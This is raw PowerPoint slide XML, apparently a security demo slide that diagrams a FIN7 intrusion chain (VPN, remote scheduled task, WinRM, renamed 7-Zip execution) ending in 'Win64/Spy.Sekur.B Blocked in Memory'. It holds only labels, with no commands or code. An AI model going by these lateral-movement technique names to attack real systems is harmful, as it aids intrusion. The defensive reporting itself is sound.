                <a:gd name="connsiteX14" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY14" fmla="*/ 619147 h 1339172"/>
                <a:gd name="connsiteX15" fmla="*/ 758821 w 1160569"/>
                <a:gd name="connsiteY15" fmla="*/ 446422 h 1339172"/>
                <a:gd name="connsiteX16" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY16" fmla="*/ 267885 h 1339172"/>
                <a:gd name="connsiteX17" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY17" fmla="*/ 0 h 1339172"/>
                <a:gd name="connsiteX18" fmla="*/ 892737 w 1160569"/>
                <a:gd name="connsiteY18" fmla="*/ 89295 h 1339172"/>
                <a:gd name="connsiteX19" fmla="*/ 1160569 w 1160569"/>
                <a:gd name="connsiteY19" fmla="*/ 133916 h 1339172"/>
                <a:gd name="connsiteX20" fmla="*/ 1160569 w 1160569"/>
                <a:gd name="connsiteY20" fmla="*/ 477112 h 1339172"/>
                <a:gd name="connsiteX21" fmla="*/ 1148262 w 1160569"/>
                <a:gd name="connsiteY21" fmla="*/ 479597 h 1339172"/>
                <a:gd name="connsiteX22" fmla="*/ 1044021 w 1160569"/>
                <a:gd name="connsiteY22" fmla="*/ 636859 h 1339172"/>
                <a:gd name="connsiteX23" fmla="*/ 1054473 w 1160569"/>
                <a:gd name="connsiteY23" fmla="*/ 688631 h 1339172"/>
                <a:gd name="connsiteX24" fmla="*/ 1024168 w 1160569"/>
                <a:gd name="connsiteY24" fmla="*/ 694750 h 1339172"/>
                <a:gd name="connsiteX25" fmla="*/ 919927 w 1160569"/>
                <a:gd name="connsiteY25" fmla="*/ 852012 h 1339172"/>
                <a:gd name="connsiteX26" fmla="*/ 969917 w 1160569"/>
                <a:gd name="connsiteY26" fmla="*/ 972698 h 1339172"/>
                <a:gd name="connsiteX27" fmla="*/ 978998 w 1160569"/>
                <a:gd name="connsiteY27" fmla="*/ 978821 h 1339172"/>
                <a:gd name="connsiteX28" fmla="*/ 977587 w 1160569"/>
                <a:gd name="connsiteY28" fmla="*/ 979106 h 1339172"/>
                <a:gd name="connsiteX29" fmla="*/ 873346 w 1160569"/>
                <a:gd name="connsiteY29" fmla="*/ 1136368 h 1339172"/>
                <a:gd name="connsiteX30" fmla="*/ 880413 w 1160569"/>
                <a:gd name="connsiteY30" fmla="*/ 1171373 h 1339172"/>
                <a:gd name="connsiteX31" fmla="*/ 811434 w 1160569"/>
                <a:gd name="connsiteY31" fmla="*/ 1223714 h 1339172"/>
                <a:gd name="connsiteX32" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY32" fmla="*/ 1277544 h 1339172"/>
                <a:gd name="connsiteX33" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY33" fmla="*/ 1339172 h 1339172"/>
                <a:gd name="connsiteX34" fmla="*/ 446368 w 1160569"/>
                <a:gd name="connsiteY34" fmla="*/ 1277544 h 1339172"/>
                <a:gd name="connsiteX35" fmla="*/ 0 w 1160569"/>
                <a:gd name="connsiteY35" fmla="*/ 579401 h 1339172"/>
                <a:gd name="connsiteX36" fmla="*/ 0 w 1160569"/>
                <a:gd name="connsiteY36" fmla="*/ 133916 h 1339172"/>
                <a:gd name="connsiteX37" fmla="*/ 267832 w 1160569"/>
                <a:gd name="connsiteY37" fmla="*/ 89295 h 1339172"/>
                <a:gd name="connsiteX38" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY38" fmla="*/ 0 h 1339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160569" h="1339172">
                  <a:moveTo>
                    <a:pt x="580284" y="267885"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="481679" y="267885"/>
                    <a:pt x="401748" y="347764"/>
                    <a:pt x="401748" y="446422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="401748" y="529434"/>
                    <a:pt x="458453" y="599531"/>
                    <a:pt x="535664" y="619147"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="535664" y="982032"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="535664" y="1006566"/>
                    <a:pt x="555751" y="1026653"/>
                    <a:pt x="580284" y="1026653"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="714200" y="1026653"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="738734" y="1026653"/>
                    <a:pt x="758821" y="1006566"/>
                    <a:pt x="758821" y="982032"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="758821" y="957499"/>
                    <a:pt x="738734" y="937411"/>
                    <a:pt x="714200" y="937411"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="624905" y="937411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624905" y="848116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714200" y="848116"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="738734" y="848116"/>
                    <a:pt x="758821" y="828029"/>
                    <a:pt x="758821" y="803495"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="758821" y="778962"/>
                    <a:pt x="738734" y="758875"/>
                    <a:pt x="714200" y="758875"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="624905" y="758875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624905" y="619147"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="702116" y="599542"/>
                    <a:pt x="758821" y="529439"/>
                    <a:pt x="758821" y="446422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="758821" y="347764"/>
                    <a:pt x="678943" y="267885"/>
                    <a:pt x="580284" y="267885"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="580284" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="671776" y="32590"/>
                    <a:pt x="776241" y="63873"/>
                    <a:pt x="892737" y="89295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="988728" y="110272"/>
                    <a:pt x="1078441" y="124552"/>
                    <a:pt x="1160569" y="133916"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1160569" y="477112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148262" y="479597"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1087004" y="505507"/>
                    <a:pt x="1044021" y="566163"/>
                    <a:pt x="1044021" y="636859"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1054473" y="688631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024168" y="694750"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="962910" y="720660"/>
                    <a:pt x="919927" y="781316"/>
                    <a:pt x="919927" y="852012"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="919927" y="899143"/>
                    <a:pt x="939031" y="941811"/>
                    <a:pt x="969917" y="972698"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="978998" y="978821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977587" y="979106"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="916329" y="1005016"/>
                    <a:pt x="873346" y="1065672"/>
                    <a:pt x="873346" y="1136368"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="880413" y="1171373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="811434" y="1223714"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="780645" y="1243791"/>
                    <a:pt x="748183" y="1261812"/>
                    <a:pt x="714200" y="1277544"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="580284" y="1339172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446368" y="1277544"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="174559" y="1151677"/>
                    <a:pt x="0" y="879345"/>
                    <a:pt x="0" y="579401"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="133916"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="82131" y="124553"/>
                    <a:pt x="171841" y="110272"/>
                    <a:pt x="267832" y="89295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="384325" y="63819"/>
                    <a:pt x="488793" y="32590"/>
                    <a:pt x="580284" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="13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SK"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="407918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8DC52-6C68-E9AC-99AC-737A2647B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Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{828C2AE1-411B-D192-8DA5-6A230EF8E17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144721" y="-5037820"/>
            <a:ext cx="30087414" cy="18514850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D740167-C2DF-E358-3372-D09B3DFA85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849229" y="1284780"/>
            <a:ext cx="30560502" cy="18285230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="!!Gradient TEAL 2" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEE6E326-98E2-BB5C-F774-DCD1B63B6A2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220222" y="-16963399"/>
            <a:ext cx="42906647" cy="26403406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B98F0B23-4430-6B76-A788-B5C22EE4DFC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14407705" y="-5577283"/>
            <a:ext cx="13607400" cy="8690365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99666D5B-608C-AC4F-44A5-011C011DB6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-12354021" y="5703318"/>
            <a:ext cx="19335716" cy="13730680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EF85BE2-50ED-93AB-B9F6-ED355ADADE15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1256633" y="539067"/>
            <a:ext cx="3251200" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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923"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>VPN – FIN7</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4754" b="1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28" name="Connector: Elbow 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFBEFF22-2346-A072-ED12-668A8A8D3BB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="45" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7281380" y="5344069"/>
            <a:ext cx="2936285" cy="415376"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Connector: Elbow 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{979ABF37-27B8-3C73-A131-B5FD350A277B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="89" idx="2"/>
            <a:endCxn id="56" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7374280" y="2793402"/>
            <a:ext cx="530918" cy="1195832"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="!!Connector: Elbow 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3127348-789B-AF51-7987-35C74D273D8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="8903371" y="5137840"/>
            <a:ext cx="796729" cy="449167"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100118"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Connector: Elbow 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC00D6EF-C6B3-060D-C498-52F326A461CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="62" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="12397814" y="-1846637"/>
            <a:ext cx="1115384" cy="452942"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Rectangle: Rounded Corners 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCCE48A9-60C9-7D96-758E-8F57263FE4E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3271101" y="1630086"/>
            <a:ext cx="7541443" cy="1495773"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12415"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect t="-23893" r="-7284" b="-248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srgbClr val="525252"/>
              </a:solidFill>
              <a:latin typeface="IntelOne Display Regular"/>
              <a:cs typeface="Arial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5B2AEB3-7C40-D8E9-DA13-340EEBA33EB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3606824" y="2133423"/>
            <a:ext cx="4317809" cy="855946"/>
            <a:chOff x="12435194" y="912131"/>
            <a:chExt cx="4317809" cy="855946"/>
          </a:xfrm>
        </p:grpSpPr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4E815F78-5E97-AAB7-D70B-C218E9946E62}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12435194" y="914400"/>
              <a:ext cx="4317809" cy="853677"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="414D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7F6F946E-2F74-AA88-F585-E4F7C2E8A98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12505042" y="912131"/>
              <a:ext cx="836659" cy="836659"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{877F974E-813C-C2A7-D56D-27C95BA55E41}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13341701" y="914400"/>
              <a:ext cx="3411302" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" dirty="0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Remote Scheduled Task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84C6E89-F1F3-A5B3-EF1E-53078EC792C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8330204" y="2139351"/>
            <a:ext cx="2190497" cy="853677"/>
            <a:chOff x="12435194" y="914400"/>
            <a:chExt cx="2190497" cy="853677"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr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F98175D9-65B4-F473-E7AA-33DB4B63D8D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12435194" y="914400"/>
              <a:ext cx="2190497" cy="853677"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4274CC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C2D417EB-9A0D-4296-9C63-042C5A3F7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/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12639457" y="1099964"/>
              <a:ext cx="608996" cy="456747"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B37FE05-2F8D-09D6-10B8-F296F1F34DB1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13341701" y="914400"/>
              <a:ext cx="1237851" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" err="1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WinRM</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/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4EAAABE4-0AD7-8E83-AAA9-F7BA2F816235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9510309" y="7827849"/>
            <a:ext cx="7872833" cy="834390"/>
            <a:chOff x="10921200" y="5257763"/>
            <a:chExt cx="7872833" cy="834390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6617AEF-F396-F990-DEA4-060415E24AAB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10921200" y="5257763"/>
              <a:ext cx="7872833" cy="834390"/>
              <a:chOff x="12435194" y="846943"/>
              <a:chExt cx="7872833" cy="834390"/>
            </a:xfrm>
            <a:effectLst/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="Rounded Rectangle 52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36B88083-029B-C26A-5AD7-6B9130DAC894}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12435194" y="914401"/>
                <a:ext cx="7872833" cy="691204"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="0097A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K"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="55" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13257E24-8744-0339-15A5-5B10EDBAB4D6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13341700" y="846943"/>
                <a:ext cx="6966327" cy="834390"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="1079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811382">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="2000" kern="0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Renamed 7-Zip execution [A0444]</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="57" name="Graphic 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21355C8D-3312-9B98-7E4B-00BA49D84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11077712" y="5333247"/>
              <a:ext cx="703855" cy="703855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69F0CC8-B280-00E7-FB83-90B46D676597}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13181977" y="-1489313"/>
            <a:ext cx="7872833" cy="853677"/>
            <a:chOff x="11179244" y="6339909"/>
            <a:chExt cx="7872833" cy="853677"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="Rounded Rectangle 61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D49CF90-D5D7-4137-A918-5D0C7CB39FD4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11179244" y="6339909"/>
              <a:ext cx="7872833" cy="853677"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EA860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63" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73953494-B6F1-C800-E385-B79FEF858F03}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12085750" y="6339909"/>
              <a:ext cx="6966327" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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Win64/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" err="1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Spy.Sekur.B</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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Blocked in Memory</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="65" name="Graphic 64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{192F55E0-FDAC-B02F-43D4-84F658364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p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="11286671" y="6375282"/>
              <a:ext cx="805644" cy="805644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93290CB-CB34-14CB-4236-13B92C0260BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4517873" y="473207"/>
            <a:ext cx="726372" cy="838155"/>
            <a:chOff x="14027225" y="3493572"/>
            <a:chExt cx="1160569" cy="1339172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FE93AC7-B253-2F77-1470-590BF6A5793C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
